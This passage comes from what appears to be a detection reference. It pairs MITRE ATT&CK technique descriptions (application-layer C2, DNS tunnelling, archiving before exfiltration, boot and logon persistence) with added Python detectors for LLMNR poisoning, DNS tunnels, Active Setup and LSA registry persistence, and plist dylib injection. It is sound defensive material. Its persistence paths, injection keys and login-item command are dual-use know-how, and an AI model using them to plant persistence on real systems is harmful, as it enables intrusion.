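                    findings.append({"type": "auth_to_spoofed_host", "victim": victim,
                                     "responder": responder, "name": name, "port": ev.dst_port})
                    break
    for responder, names in canary_hits.items():
        findings.append({"type": "canary_answered", "responder": responder, "names": sorted(names)})
    for responder, names in names_by_responder.items():
        if len(names) >= min_names:
            findings.append({"type": "promiscuous_responder", "responder": responder,
                             "name_count": len(names)})
    return findings


def sample_events():
    """Constructed capture: a workstation mistypes a share name, asks for wpad
    and a few stale hosts plus a planted canary; 10.0.0.66 answers them all,
    then receives an SMB connection from the victim."""
    victim, attacker = "10.0.0.20", "10.0.0.66"
    evs = []
    for i, name in enumerate(["fileshrae", "wpad", "prntsrv01", "nas-old", "canary-x9q2"]):
        t = 10.0 + i
        evs.append(NetEvent(t, "query", victim, "224.0.0.252", "LLMNR", name))
        evs.append(NetEvent(t + 0.2, "response", attacker, victim, "LLMNR", name))
    evs.append(NetEvent(14.5, "query", victim, "10.0.0.255", "NBT-NS", "FILESHRAE"))
    evs.append(NetEvent(14.7, "response", attacker, victim, "NBT-NS", "FILESHRAE"))
    evs.append(NetEvent(15.0, "conn", victim, attacker, dst_port=445))
    return evs


if __name__ == "__main__":
    for f in find_poisoners(sample_events(), canary_names={"canary-x9q2"}):
        print(f)
```

The canary is the cheapest high-confidence signal: schedule a resolver on a few hosts to ask for a name that is registered nowhere, and any answer is a poisoner. The connection correlation matters because it separates a noisy misconfigured host from an actual credential capture or relay.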
T1071 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL Adversaries may communicate using application layer protocols to avoid detection/network filtering by
blending in with existing traffic. Commands to the remote system, and often the results of those commands,
will be embedded within the protocol traffic between the client and server. Adversaries may utilize many
different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For
connections that occur internally within an enclave (such as those between a proxy or pivot node and other
nodes), commonly used protocols are SMB, SSH, or RDP. https://attack.mitre.org/techniques/T1071
T1071.004 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_DNS Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid
detection/network filtering by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic between the client and server.
The DNS protocol serves an administrative function in computer networking and thus may be very common
in environments. DNS traffic may also be allowed even before network authentication is completed. DNS
packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling,
adversaries may abuse DNS to communicate with systems under their control within a victim network while
also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
https://attack.mitre.org/techniques/T1071/004
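The "many fields and headers in which data can be concealed" point above has a measurable flip side: a tunnel that pushes payload through query names produces subdomains that are almost all unique, unusually long and close to random, and it leans on TXT or NULL records for response capacity. The Python below is an added example (not code from this page or from any product) that aggregates constructed query records per registered domain and scores those four indicators; a CDN with many short hostnames is included to show that uniqueness alone does not trip it. The thresholds and the two-label registered-domain shortcut are assumptions.

```python
"""Score DNS query logs for tunnelling indicators.

Added example. The log records are constructed here; in practice they would
come from your resolver or network sensor. Thresholds are assumptions.
"""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character of `s` (plug-in estimate)."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    # Assumption: the last two labels are the registered domain. Real deployments
    # should use a Public Suffix List library so names under co.uk etc. work.
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


RARE_QTYPES = {"TXT", "NULL"}  # record types tunnels favour for payload room


def score_domains(records, min_queries=20, uniq_ratio=0.8, mean_len=30.0,
                  mean_entropy=3.5, rare_ratio=0.5, min_score=3):
    """Aggregate per registered domain and flag those meeting >= min_score of
    four indicators: mostly unique subdomains, long prefixes, high-entropy
    prefixes, and heavy use of TXT/NULL queries."""
    agg = defaultdict(lambda: {"n": 0, "subs": set(), "len": 0, "ent": 0.0, "rare": 0})
    for rec in records:
        qname = rec["qname"].rstrip(".").lower()
        base = registered_domain(qname)
        prefix = qname[: -(len(base) + 1)] if len(qname) > len(base) else ""
        st = agg[base]
        st["n"] += 1
        st["subs"].add(prefix)
        st["len"] += len(prefix)
        st["ent"] += shannon_entropy(prefix.replace(".", ""))
        st["rare"] += int(rec["qtype"] in RARE_QTYPES)
    flagged = []
    for base, st in agg.items():
        n = st["n"]
        if n < min_queries:
            continue
        metrics = {
            "unique_ratio": len(st["subs"]) / n,
            "mean_prefix_len": st["len"] / n,
            "mean_entropy": st["ent"] / n,
            "rare_qtype_ratio": st["rare"] / n,
        }
        score = sum([metrics["unique_ratio"] >= uniq_ratio,
                     metrics["mean_prefix_len"] >= mean_len,
                     metrics["mean_entropy"] >= mean_entropy,
                     metrics["rare_qtype_ratio"] >= rare_ratio])
        if score >= min_score:
            flagged.append({"domain": base, "queries": n, "score": score,
                            **{k: round(v, 2) for k, v in metrics.items()}})
    return sorted(flagged, key=lambda f: -f["score"])


def sample_dns_log():
    """Constructed records: ordinary browsing, a CDN with many short hostnames,
    and a tunnel pushing hex-encoded chunks in TXT queries."""
    recs = []
    for i in range(25):
        recs.append({"qname": ["www.example.com", "mail.example.com"][i % 2], "qtype": "A"})
    for i in range(20):
        recs.append({"qname": f"img{i}.cdn-example.org", "qtype": "A"})  # unique but short
    for i in range(30):
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:48]
        recs.append({"qname": f"{chunk[:32]}.{chunk[32:]}.c2-example.net", "qtype": "TXT"})
    return recs


if __name__ == "__main__":
    for f in score_domains(sample_dns_log()):
        print(f)
```

Requiring three of four indicators is what keeps the CDN out of the result: it scores only on uniqueness. Base32- or base64-style encodings push entropy higher than the hex used here, and some tunnels hide in A/AAAA records only, which is why the record-type indicator is weighted as one vote rather than a requirement.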
T1071.002 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_FILE_TRANSFER_PROTOCOLS Adversaries may communicate using application layer protocols associated with transferring files to avoid
detection/network filtering by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets
produced from these protocols may have many fields and headers in which data can be concealed. Data
could also be concealed within the transferred files. An adversary may abuse these protocols to
communicate with systems under their control within a victim network while also mimicking normal,
expected traffic. https://attack.mitre.org/techniques/T1071/002
T1071.003 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_MAIL_PROTOCOLS Adversaries may communicate using application layer protocols associated with electronic mail delivery to
avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and
often the results of those commands, will be embedded within the protocol traffic between the client and
server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in
environments. Packets produced from these protocols may have many fields and headers in which data
can be concealed. Data could also be concealed within the email messages themselves. An adversary may
abuse these protocols to communicate with systems under their control within a victim network while also
mimicking normal, expected traffic. https://attack.mitre.org/techniques/T1071/003
T1071.001 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_WEB_PROTOCOLS Adversaries may communicate using application layer protocols associated with web traffic to avoid
detection/network filtering by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S
packets have many fields and headers in which data can be concealed. An adversary may abuse these
protocols to communicate with systems under their control within a victim network while also mimicking
normal, expected traffic. https://attack.mitre.org/techniques/T1071/001
T1010 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_WINDOW_DISCOVERY Adversaries may attempt to get a listing of open application windows. Window listings could convey
information about how the system is used or give context to information collected by a keylogger. https://
attack.mitre.org/techniques/T1010
T1560 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data
can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption
can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous
upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be
performed using a utility, 3rd party library, or custom method. https://attack.mitre.org/techniques/T1560
T1560.003 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA_ARCHIVE_VIA_CUSTOM_METHOD An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method.
Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers
implemented with no external library or utility references. Custom implementations of well-known
compression algorithms have also been used.(Citation: ESET Sednit Part 2) https://attack.mitre.org/
techniques/T1560/003
T1560.002 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA_ARCHIVE_VIA_LIBRARY An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries.
Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006)
rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include
functionality to encrypt and/or compress data. Some archival libraries are preinstalled on systems, such as
bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The
libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar
execution mechanism. https://attack.mitre.org/techniques/T1560/002
T1560.001 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA_ARCHIVE_VIA_UTILITY An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities.
Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation:
WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt
and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or
`zip` on Windows systems. https://attack.mitre.org/techniques/T1560/001
T1123 XDM_CONST.MITRE_TECHNIQUE_AUDIO_CAPTURE An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or
applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into
sensitive conversations to gather information. Malware or scripts may be used to interact with the devices
through an available API provided by the operating system or an application to capture audio. Audio files
may be written to disk and exfiltrated later. https://attack.mitre.org/techniques/T1123
T1119 XDM_CONST.MITRE_TECHNIQUE_AUTOMATED_COLLECTION Once established within a system or network, an adversary may use automated techniques for collecting
internal data. Methods for performing this technique could include use of a [Command and Scripting
Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria
such as file type, location, or name at specific time intervals. This functionality could also be built into
remote access tools. This technique may incorporate use of other techniques such as [File and Directory
Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/
techniques/T1570) to identify and move files. https://attack.mitre.org/techniques/T1119
T1020 XDM_CONST.MITRE_TECHNIQUE_AUTOMATED_EXFILTRATION Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing
after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques
likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel]
(https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://
attack.mitre.org/techniques/T1048). https://attack.mitre.org/techniques/T1020
T1020.001 XDM_CONST.MITRE_TECHNIQUE_AUTOMATED_EXFILTRATION_TRAFFIC_DUPLICATION Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network
infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis
and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network
analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network
infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be
possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image]
(https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog
Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing]
(https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or
[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives
of the adversary. https://attack.mitre.org/techniques/T1020/001
T1197 XDM_CONST.MITRE_TECHNIQUE_BITS_JOBS Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows
Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism
exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).
(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and
other applications preferred to operate in the background (using available idle bandwidth) without
interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a
queue of one or more file operations. The interface to create and manage BITS jobs is accessible through
[PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/
software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse
BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained
in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.
(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation:
Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing
jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job
completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU
BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over
Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
https://attack.mitre.org/techniques/T1197
T1547 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION Adversaries may configure system settings to automatically execute a program during system boot or logon
to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may
have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft
Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance
Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include
automatically executing programs that are placed in specially designated directories or are referenced by
repositories that store configuration information, such as the Windows Registry. An adversary may achieve
the same goal by modifying or extending features of the kernel. Since some boot or logon autostart
programs run with higher privileges, an adversary may leverage these to elevate privileges. https://
attack.mitre.org/techniques/T1547
T1547.014 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_ACTIVE_SETUP Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value
stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup
2010) These programs will be executed under the context of the user and will have the account's
associated permissions level. Adversaries may abuse Active Setup by creating a key under
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for
StubPath. This value will serve as the program that will be executed when a user logs into the computer.
(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering
Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016) Adversaries
can abuse these components to execute malware, such as remote access tools, to maintain persistence
through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/
T1036) to make the Registry entries look as if they are associated with legitimate programs. https://
attack.mitre.org/techniques/T1547/014
T1547.002 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_AUTHENTICATION_PACKAGE Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows
authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start.
They provide support for multiple logon processes and multiple security protocols to the operating system.
(Citation: MSDN Authentication Packages) Adversaries can use the autostart mechanism provided by LSA
authentication packages for persistence by placing a reference to a binary in the Windows Registry location
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication
Packages"=<target binary>. The binary will then be executed by the system when the authentication
packages are loaded. https://attack.mitre.org/techniques/T1547/002
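Both of the Registry locations named in the two entries above (Active Setup's per-component StubPath and the LSA "Authentication Packages" REG_MULTI_SZ) show up verbatim in a `reg export` dump, so one small parser can audit both. The Python below is an added example, not code from this page or from any Microsoft or Palo Alto tool: it parses the .reg subset that `reg export` emits, including hex(7) multi-string values spread over continuation lines, then flags StubPath commands that run from outside trusted directories and any authentication package beyond the stock baseline. The sample dump, its placeholder GUIDs, the package named "rogue", the trusted-prefix list and the msv1_0 baseline are all constructed assumptions to tune per environment.

```python
"""Audit a `reg export` dump for Active Setup StubPath and LSA
"Authentication Packages" persistence.

Added example, not part of the XSIAM schema. The .reg text below is
constructed (placeholder GUIDs, a made-up package named "rogue"); the
allow-lists are assumptions to tune per environment. `reg export` writes
UTF-16LE with a BOM, so read real files with encoding="utf-16".
"""
import re

ACTIVE_SETUP = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components"
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
TRUSTED_PREFIXES = ("c:\\windows\\", "%systemroot%\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
BASELINE_AUTH_PACKAGES = {"msv1_0"}  # stock Windows ships only this one

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text):
    """Parse the .reg subset `reg export` emits: quoted strings, dword and
    hex(7) (REG_MULTI_SZ, UTF-16LE) values, with backslash continuation lines.
    Returns {key_path: {value_name: value}}."""
    keys, current, lines, i = {}, None, text.splitlines(), 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
            continue
        while line.endswith("\\") and i < len(lines):  # join continuation lines
            line = line[:-1] + lines[i].strip()
            i += 1
        m = _VALUE_RE.match(line)
        if m is None or current is None:
            continue
        name, raw = _unescape(m.group(1)), m.group(2)
        if raw.startswith('"') and raw.endswith('"'):
            value = _unescape(raw[1:-1])
        elif raw.startswith("dword:"):
            value = int(raw[6:], 16)
        elif raw.startswith("hex(7):"):
            data = bytes(int(b, 16) for b in raw[7:].split(",") if b.strip())
            value = [s for s in data.decode("utf-16-le").split("\x00") if s]
        else:
            value = raw
        keys[current][name] = value
    return keys


def find_suspicious_stubpaths(keys):
    """Active Setup components whose StubPath runs from outside trusted dirs."""
    hits = []
    for path, values in keys.items():
        if not path.lower().startswith(ACTIVE_SETUP.lower() + "\\"):
            continue
        stub = values.get("StubPath")
        if stub and not stub.lstrip('"').lower().startswith(TRUSTED_PREFIXES):
            hits.append({"component": path.rsplit("\\", 1)[1], "stubpath": stub})
    return hits


def find_unexpected_auth_packages(keys):
    """Entries in Lsa\\Authentication Packages beyond the known baseline."""
    for path, values in keys.items():
        if path.lower() == LSA_KEY.lower():
            pkgs = values.get("Authentication Packages", [])
            return [p for p in pkgs if p.lower() not in BASELINE_AUTH_PACKAGES]
    return []


SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000001}]
"StubPath"="C:\\Windows\\System32\\example-setup.exe /quiet"
"IsInstalled"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{00000000-0000-0000-0000-000000000002}]
"StubPath"="C:\\Users\\Public\\update.exe"
"IsInstalled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,00,73,00,76,00,31,00,5f,00,30,00,00,00,72,00,\
  6f,00,67,00,75,00,65,00,00,00,00,00
"""

if __name__ == "__main__":
    parsed = parse_reg_export(SAMPLE_REG)
    print(find_suspicious_stubpaths(parsed))
    print(find_unexpected_auth_packages(parsed))
```

Active Setup only fires a StubPath when the per-user copy under HKCU lacks the component's version, so a path check on HKLM alone tells you what will run for every new logon, not what has already run; pair it with the HKCU mirror when scoping an incident. A trusted directory prefix is a weak filter on its own (world-writable subfolders exist under C:\Windows), so treat it as triage, and follow up on the file's signature and hash.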
T1547.006 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_KERNEL_MODULES_AND_EXTENSIONS Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel
Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They
extend the functionality of the kernel without the need to reboot the system. For example, one type of
module is the device driver, which allows the kernel to access hardware connected to the system. (Citation:
Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://
attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation:
Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself,
selective hiding of files, processes and network activity, as well as log tampering, providing authenticated
backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) Kernel
extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for
Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS
Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel
Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate
privileges. Examples have been found in the wild and there are some open source projects. (Citation:
Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub
Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel
Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) https://attack.mitre.org/
techniques/T1547/006
T1547.008 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_LSASS_DRIVER Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The
Windows security subsystem is a set of components that manage and enforce the security policy for a
computer or domain. The Local Security Authority (LSA) is the main component responsible for local
security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated
with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS)
lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to
obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://
attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute
malicious payloads. https://attack.mitre.org/techniques/T1547/008
T1547.015 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_LOGIN_ITEMS Adversaries may add login items to execute upon user login to gain persistence or escalate privileges.
Login items are applications, documents, folders, or server connections that are automatically launched
when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or
Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using
scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the
Service Management Framework uses the API call SMLoginItemSetEnabled. Login items installed using
the Service Management Framework leverage launchd, are not visible in the System Preferences, and can
only be removed by the application that created them.(Citation: Adding Login Items)(Citation:
SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System
Preferences, can hide the application when it launches, and are executed through LaunchServices, not
launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple
Developer) Users and applications use login items to configure their user environment to launch commonly
used services or applications, such as email, chat, and music applications. Adversaries can utilize
[AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/
techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at
startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://
attack.mitre.org/techniques/T1059/002) to send an Apple event to the “System Events” process, which has
an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a
command such as tell application “System Events” to make login item at end with
properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis
2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious
executable to the login item file list located in ~/Library/Application Support/
com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic)
Adversaries can also use login items to launch executables that can be used to control the victim system
remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac
malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019) https://attack.mitre.org/
techniques/T1547/015
T1547.011 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PLIST_MODIFICATION Adversaries can modify property list files (plist files) to execute their code as part of establishing
persistence. Plist files are used by macOS applications to store properties and configuration settings for
applications and services. Applications use information plist files, Info.plist, to tell the operating system
how to handle the application at runtime using structured metadata in the form of keys and values. Plist files
are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary
format.(Citation: fileinfo plist file description) Adversaries can modify paths to executed binaries, add
command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon
user logon or system startup. Through modifying plist files in these locations, adversaries can also execute
a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key
combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user
logon, the plist is called for execution and the malicious dylib is executed within the process space.
Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist
file.(Citation: wardle artofmalware volume1) https://attack.mitre.org/techniques/T1547/011
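The DYLD_INSERT_LIBRARIES pattern described for T1547.011 is easy to check mechanically. The following is an added example, not code from the XSIAM documentation or from MITRE: it loads a launchd job plist or an application Info.plist with the standard library and reports any DYLD_* variable set under the EnvironmentVariables or LSEnvironment dictionaries named above. The three plist documents and the paths inside them are constructed for this example.

```python
"""Flag dylib injection configured through plist autostart files (T1547.011).

Added example, not from the XSIAM documentation or MITRE. The plist contents
below are constructed; the paths in them are not real indicators.
"""
import plistlib
from typing import Any, Dict, List, Optional, Tuple

# Containers through which a plist sets environment for the launched program:
# EnvironmentVariables (launchd jobs) and LSEnvironment (Info.plist, via LaunchServices).
ENV_CONTAINERS = ("EnvironmentVariables", "LSEnvironment")


def load_plist(data: bytes) -> Dict[str, Any]:
    """Parse XML or binary plist bytes; plistlib detects the format from the header."""
    return plistlib.loads(data)


def program_of(plist: Dict[str, Any]) -> Optional[str]:
    """Best-effort path of what the plist launches (launchd job or app bundle)."""
    if isinstance(plist.get("Program"), str):
        return plist["Program"]
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args:
        return str(args[0])
    return plist.get("CFBundleExecutable")  # Info.plist: executable name inside the bundle


def find_injected_dylibs(data: bytes) -> List[Tuple[str, str, str]]:
    """Return (container, variable, value) for every DYLD_* variable set in the plist.

    DYLD_INSERT_LIBRARIES is the textbook case; other DYLD_* variables also steer
    library resolution, so they are reported as well.
    """
    plist = load_plist(data)
    hits: List[Tuple[str, str, str]] = []
    for container in ENV_CONTAINERS:
        env = plist.get(container)
        if not isinstance(env, dict):
            continue
        for var, val in env.items():
            if str(var).upper().startswith("DYLD_"):
                hits.append((container, str(var), str(val)))
    return hits


# Constructed LaunchAgent: a legitimate-looking program with an injected dylib.
SUSPICIOUS_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array><string>/Applications/Helper.app/Contents/MacOS/Helper</string></array>
  <key>RunAtLoad</key><true/>
  <key>EnvironmentVariables</key><dict>
    <key>DYLD_INSERT_LIBRARIES</key><string>/Users/Shared/.cache/inject.dylib</string>
  </dict>
</dict></plist>
"""

# Constructed Info.plist: the application-bundle variant using LSEnvironment.
SUSPICIOUS_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>CFBundleExecutable</key><string>Notes</string>
  <key>CFBundleIdentifier</key><string>com.example.notes</string>
  <key>LSEnvironment</key><dict>
    <key>DYLD_INSERT_LIBRARIES</key><string>/Library/Application Support/.hidden/hook.dylib</string>
  </dict>
</dict></plist>
"""

# Constructed clean job: an environment block that only sets PATH.
CLEAN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.sync</string>
  <key>Program</key><string>/usr/local/bin/sync-agent</string>
  <key>RunAtLoad</key><true/>
  <key>EnvironmentVariables</key><dict><key>PATH</key><string>/usr/bin:/bin</string></dict>
</dict></plist>
"""

if __name__ == "__main__":
    for name, blob in (("agent", SUSPICIOUS_AGENT), ("info", SUSPICIOUS_INFO_PLIST), ("clean", CLEAN_AGENT)):
        print(name, program_of(load_plist(blob)), find_injected_dylibs(blob))
```

To run it against a real host, feed the bytes of each file under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons, and each bundle's Contents/Info.plist, to find_injected_dylibs.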
T1547.010 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PORT_MONITORS Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or
privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at
startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the
print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level
permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a
fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.
The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor *
WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system
reboot and execute as SYSTEM. https://attack.mitre.org/techniques/T1547/010
